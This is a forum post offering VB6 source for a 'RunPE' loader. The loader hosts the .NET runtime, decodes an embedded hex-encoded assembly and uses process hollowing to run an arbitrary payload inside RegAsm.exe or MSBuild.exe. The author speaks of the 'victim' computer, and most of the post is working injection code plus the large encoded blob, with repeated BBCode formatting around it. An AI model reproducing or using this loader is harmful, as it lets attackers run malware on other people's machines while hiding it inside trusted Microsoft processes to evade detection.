VB6 CLR RunPE x86 / Native & .NET
Publicado: 23 Nov 2019, 20:28
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Hello friends[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]I took C# RunPE to import it into your favorite VB6 with the help of Common Language Runtime[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]So let's get started[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]For RunPE to work we need Net Framework 2.0, we need to import into our project two link in References:[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Just stipulate that the work of the victim on the computer is not as it will not affect, now Net Framework is part of windows, it is in our hands[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Now you can use this RunPE[/font][/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Let me tell you about the parameters[/font]
[/font][/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]You can pass arguments to the process[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Injection by Default occurs in "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe", you can use another process from this directory, for example MSBuild.exe[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]I hope that you would understand everything, now I wish you good luck [/font]
[/font][/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]I took C# RunPE to import it into your favorite VB6 with the help of Common Language Runtime[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]So let's get started[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]For RunPE to work we need Net Framework 2.0, we need to import into our project two link in References:[/font]
Código: Seleccionar todo
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.tlb
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Now you can use this RunPE[/font][/font]
Código: Seleccionar todo
'''''''' RunPE .net CLR '''''''''
'''''''' By MR. MORFEY ''''''''''
''' My Telegram: M0RF3Y0x1337 '''
Private Declare Function DispCallFunc Lib "oleaut32" (ByVal pv As Long, ByVal ov As Long, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As Long, ByRef par As Variant) As Long
Private Declare Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As Long)
Private Declare Function VarPtrArray Lib "msvbvm60" Alias "VarPtr" (ByRef Ptr() As Any) As Long
Public Function RunPE(Arg As String, PayLoad() As Byte)
Dim host As New mscoree.CorRuntimeHost, dom As AppDomain
host.Start
host.GetDefaultDomain dom
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.hex"
Dim bytes() As Byte
ShellCode = ShellCode & "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005045"
ShellCode = ShellCode & "00004C010300997BD95D0000000000000000E00022210B010B000014000000060000000000008E32000000200000000000000000400000200000000200000400000000000000040000000000000000800000000200000000000003004085000010000010000000001000001000000000000010000000000000000000000034320000"
ShellCode = ShellCode & "57000000004000005803000000000000000000000000000000000000006000000C000000D43100001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000941200000020"
ShellCode = ShellCode & "00000014000000020000000000000000000000000000200000602E7273726300000058030000004000000004000000160000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001A000000000000000000000000000040000042000000000000000000000000000000007032000000000000"
ShellCode = ShellCode & "4800000002000500EC230000E80D000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001330020015000000000000000225280100000A037D0100000402047D020000042A000000133001000700000000000000027B010000042A001330"
ShellCode = ShellCode & "01000700000000000000027B020000042A7E7201000070280500000A720F00007003280600000A040517280F000006262A00133004001B00000001000011170A2B110203040528100000062C02172A0617580A061B31EB162A001B300A00D502000002000011160A725900007002280700000A0B1202FE15050000021203FE150400"
ShellCode = ShellCode & "00021202D005000002280800000A280900000A280A00000A7D0700000403280B00000A2D0D07726700007003280600000A0B02077E0C00000A7E0C00000A1620040000087E0C00000A141202120328040000062D06730D00000A7A041F3C280E00000A13040411041F3458280E00000A130520B30000008D11000001130611061620"
ShellCode = ShellCode & "020001009E280F00000A1A3315097B04000004110628050000062D1B730D00000A7A097B04000004110628060000062D06730D00000A7A11061F29941307161308097B0300000411071E5812081A120028090000062D06730D00000A7A110511083315097B030000041108280B0000062C06730D00000A7A0411041F5058280E0000"
ShellCode = ShellCode & "0A13090411041F5458280E00000A130A16130B097B030000041105110920003000001F40280C000006130C052D1E110C2D1A17130B097B0300000416110920003000001F40280C000006130C110C2D06730D00000A7A097B03000004110C04110A1200280A0000062D06730D00000A7A110420F800000058130D0411041C58281000"
ShellCode = ShellCode & "000A130E1613112B7004110D1F0C58280E00000A131204110D1F1058280E00000A131304110D1F1458280E00000A131411132C3811138D12000001131504111411151611158E69281100000A097B03000004110C111258111511158E691200280A0000062D06730D00000A7A110D1F2858130D1111175813111111110E328A110C28"
ShellCode = ShellCode & "1200000A130F097B0300000411071E58110F1A1200280A0000062D06730D00000A7A0411041F2858280E00000A1310110B2C041105130C11061F2C110C1110589E280F00000A1A3315097B04000004110628070000062D1B730D00000A7A097B04000004110628080000062D06730D00000A7A097B04000004280D00000615330673"
ShellCode = ShellCode & "0D00000A7ADE2326097B05000004281300000A281400000A131611162C0711166F1500000A161317DE02172A11172A000000411C0000000000003900000074020000AD02000023000000050000011E02281600000A2A42534A4201000100000000000C00000076322E302E35303732370000000005006C0000002C060000237E0000"
ShellCode = ShellCode & "98060000D004000023537472696E677300000000680B00006C00000023555300D40B0000100000002347554944000000E40B00000402000023426C6F62000000000000000200000057B5A2150902000000FA01330016C4000100000022000000050000000F0000001100000031000000220000001A00000001000000020000000200"
ShellCode = ShellCode & "0000010000000200000002000000020000000A0000000100000002000000020000000000E80201000000000006009002F70206002A016C030600FE00F7020600DF03F7020600FE03F70206006902AF0406000504F7020600B302F7020A00D70359030600EB00F7020600BD00F7020600C9026C0306001104F70206005203F7020600"
ShellCode = ShellCode & "2503F70206003F03F70206001A00F70206009A02F70206003803F70206007A04F7020600E100F7020600DE018B0306004B028B0306003E0113030600FE0113030600170213030600AC01130306007001130306003202130306008D0113030600550113030600F0006C030600160159038700AB030000000000004800000000000100"
ShellCode = ShellCode & "010001011000C901000005000100010001001000550000001500030004000B011000600000005500030012000B0110006B000000550007001200010060000A00010072000D0006006000EB0006006B00EB00060072001C01060099001C01060060001C0106006B000A00060072000A00060099000A000610A8021F010600B102EB00"
ShellCode = ShellCode & "0600BE02EB000600C502EB000600C702EB0050200000000086184C0314000100742000000000860060001A000300882000000000860072001E0003000000000080009160C9034400030000000000800091602F045B000D00000000008000916019045B000F00000000008000916056045B001100000000008000916040045B001300"
ShellCode = ShellCode & "00000000800091608A046200150000000000800091609C046D001A000000000080009160FE0278001F00000000008000916067047E00210000000000800091608300870026009B20000000008600900098002700BC200000000096002F03A4002A00E4200000000091006000A4002E00E4230000000086184C031000320000000100"
ShellCode = ShellCode & "6000000002007200000001000100000002000500000003002000000004002400000005002800000006002C00000007003800000008003C0000000900400000000A0044000000010001000000020005000000010001000000020005000000010001000000020005000000010001000000020005000000010001000000020005000000"
ShellCode = ShellCode & "03002000000004002400000005002800000001000100000002000500000003002000000004002400000005002800000001000100000002000500000001000100000002000500000003002000000004002400000005002800000001000100000001006D0000000200BA0200000300760400000100C002000002009500000003005B00"
ShellCode = ShellCode & "00000400B20000000100010000000200050000000300200000000400240009004C03100011004C032A0019004C03350031004C03100039009B008C004100F00391004100F703CE005100CF00D4006100AA02DB0069000900E1004100BF04E60071003303EB0079004C03100081001200EE0071009F02F50081003000F90099008004"
ShellCode = ShellCode & "00018100BA030B016900120011014900740016014900F202100029004C031000B1004C032601B9004C031000C1004C035301C9004C035301D1004C035301D9004C035301E1004C035301E9004C035301F1004C035301F9004C03530101014C03530109014C03D5012E000B01AB012E001300A5012E0003012F002E00FB002F002E00"
ShellCode = ShellCode & "F3002F002E00EB0098012E00E3002F002E00DB0080012E00D30058012E000A0063012E00CB0058012E001301DC012E00C30034012E00BB002B0143001B003B00430013002F00800023005600A00023005600C00023005600E00023005600000123005600200123005600400123005600600123005600800123005600A00123005600"
ShellCode = ShellCode & "1600230101000000000004000100000000000500A000AD0002000100000051002200000053002600020002000300020003000500D102DE0204010900C903010000010B002F04010000010D001904010000010F00560401000001110040040100000113008A040100000115009C04010000011700FE02020000011900670401000001"
ShellCode = ShellCode & "1B0083000100048000000100000000000000000000000000C303000002000000000000000000000001006200000000000200000000000000000000000100F702000000000400030005000300000000000000000000415F3000415F3100546F55496E74333200546F496E74333200496E74333200415F3200415F3300415F3400415F"
ShellCode = ShellCode & "3500546F496E74313600415F3600415F3700415F3800415F39003C4D6F64756C653E004100430052756E504500646174610061006D73636F726C696200620070726F6300630047657450726F636573734279496400526573756D65546872656164004C6F616400636D64006400476574456E7669726F6E6D656E745661726961626C"
ShellCode = ShellCode & "6500636F6D70617469626C650052756E74696D655479706548616E646C65004765745479706546726F6D48616E646C650056616C756554797065005479706500477569644174747269627574650041747472696275746555736167654174747269627574650044656275676761626C6541747472696275746500436F6D5669736962"
ShellCode = ShellCode & "6C6541747472696275746500417373656D626C795469746C6541747472696275746500417373656D626C7954726164656D61726B41747472696275746500417373656D626C7946696C6556657273696F6E41747472696275746500417373656D626C79436F6E66696775726174696F6E41747472696275746500417373656D626C79"
ShellCode = ShellCode & "4465736372697074696F6E41747472696275746500446F746675736361746F7241747472696275746500436F6D70696C6174696F6E52656C61786174696F6E7341747472696275746500417373656D626C7950726F6475637441747472696275746500417373656D626C79436F707972696768744174747269627574650041737365"
ShellCode = ShellCode & "6D626C79436F6D70616E794174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465005375707072657373556E6D616E61676564436F64655365637572697479417474726962757465004174747269627574650042797465006765745F53697A6500650053697A654F66006600537472696E"
ShellCode = ShellCode & "67004172670067007061746800680069004D61727368616C006B65726E656C33322E646C6C006E74646C6C2E646C6C00436C6173732E646C6C004B696C6C0053797374656D004E74556E6D6170566965774F6653656374696F6E0053797374656D2E5265666C656374696F6E00457863657074696F6E0052756E005A65726F004275"
ShellCode = ShellCode & "6666657200426974436F6E766572746572002E63746F7200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F646573004765"
ShellCode = ShellCode & "74427974657300436C6173730043726561746550726F636573730050726F63657373004174747269627574655461726765747300436F6E63617400466F726D6174004F626A65637400456E7669726F6E6D656E7400436F6E7665727400576F773634476574546872656164436F6E7465787400476574546872656164436F6E746578"
ShellCode = ShellCode & "7400576F773634536574546872656164436F6E7465787400536574546872656164436F6E74657874005669727475616C416C6C6F6345780070617900417272617900426C6F636B436F7079005265616450726F636573734D656D6F727900577269746550726F636573734D656D6F72790053797374656D2E53656375726974790049"
ShellCode = ShellCode & "734E756C6C4F72456D70747900000000000D570069006E0044006900720000495C004D006900630072006F0073006F00660074002E004E00450054005C004600720061006D00650077006F0072006B005C00760032002E0030002E00350030003700320037005C00000D200022007B0030007D0022000003200000005C34360349F5"
ShellCode = ShellCode & "EE4AAE76F941D7E8422B0008B77A5C561934E08902060E02060803200001052002010E080320000E032000080328000E03280008042001010205010000000005200101111108010001000000000011000A020E0E18180209180E101114101110040100000006000202181D080A000502180810080810080A00050218081D05081008"
ShellCode = ShellCode & "05000208180808000508180808080804000108180400010E0E0600030E0E0E0E072003010E0E1D0503070108080004020E0E1D0502200718080E1114111008081D0808080808020808061D0508080808081D051225020500020E0E1C0600011229112D0500010812290400010908040001020E020618060002081D05080300000806"
ShellCode = ShellCode & "0002061D05080A000501125108125108080500011D0508040001080905000112250802060903061D05021E2404200101080801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F777301042001010E0A010005436C61737300001C0100133030303A303A303A352E34322E302E393531340000"
ShellCode = ShellCode & "0000000017010012436F7079726967687420C2A920203230313900000C010007312E302E302E3000000501000100002901002431393661366538342D383337652D346236342D623964362D6462626132353839343764330000062001011180890801000200000000001C012D405E5F606B626D646F6B656C6B686B6A767370744142"
ShellCode = ShellCode & "43444546000000000000997BD95D000000000200000041000000F0310000F01300005253445369C8DB59B1CE1947866EE477F8F0230201000000443A5C436C6173735C62696E5C44656275675C446F7466757363617465645C436C6173732E706462000000005C32000000000000000000007E320000002000000000000000000000"
ShellCode = ShellCode & "000000000000000000000000703200000000000000000000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000FC0200000000000000000000"
ShellCode = ShellCode & "FC0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000001000000000000000100000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F0000000000240004000000"
ShellCode = ShellCode & "5400720061006E0073006C006100740069006F006E00000000000000B0045C020000010053007400720069006E006700460069006C00650049006E0066006F0000003802000001003000300030003000300034006200300000001A000100010043006F006D006D0065006E007400730000000000000022000100010043006F006D00"
ShellCode = ShellCode & "700061006E0079004E0061006D0065000000000000000000340006000100460069006C0065004400650073006300720069007000740069006F006E000000000043006C006100730073000000300008000100460069006C006500560065007200730069006F006E000000000031002E0030002E0030002E003000000034000A000100"
ShellCode = ShellCode & "49006E007400650072006E0061006C004E0061006D006500000043006C006100730073002E0064006C006C0000004800120001004C006500670061006C0043006F007000790072006900670068007400000043006F0070007900720069006700680074002000A90020002000320030003100390000002A00010001004C0065006700"
ShellCode = ShellCode & "61006C00540072006100640065006D00610072006B00730000000000000000003C000A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D006500000043006C006100730073002E0064006C006C0000002C0006000100500072006F0064007500630074004E0061006D0065000000000043006C006100"
ShellCode = ShellCode & "730073000000340008000100500072006F006400750063007400560065007200730069006F006E00000031002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000031002E0030002E0030002E003000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "0000000000000000000000000000000000000000000000000000003000000C000000903200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "000000000000000000000000000000000000"
EL.Text = ShellCode
bytes = EL.NodeTypedValue
Dim vTypes(0 To 1) As Integer
Dim vValues(0 To 1) As Long
Dim pPArry As Long: pPArry = VarPtrArray(bytes)
Dim pArry As Long
RtlMoveMemory pArry, ByVal pPArry, 4
Dim vWrap: vWrap = pArry
vValues(0) = VarPtr(vWrap)
vTypes(0) = 16411
Dim pRef As Long: pRef = 0
Dim vWrap2: vWrap2 = VarPtr(pRef)
vValues(1) = VarPtr(vWrap2)
vTypes(1) = 16396
Call DispCallFunc(ObjPtr(dom), 45 * 4, 4, vbLong, 2, vTypes(0), vValues(0), 0)
Dim aRef As mscorlib.Assembly
RtlMoveMemory aRef, pRef, 4
aRef.CreateInstance("RunPE").Load "RegAsm.exe", Arg, PayLoad
End Function
[/font][/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]You can pass arguments to the process[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Injection by Default occurs in "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe", you can use another process from this directory, for example MSBuild.exe[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]I hope that you would understand everything, now I wish you good luck [/font]
[/font][/font]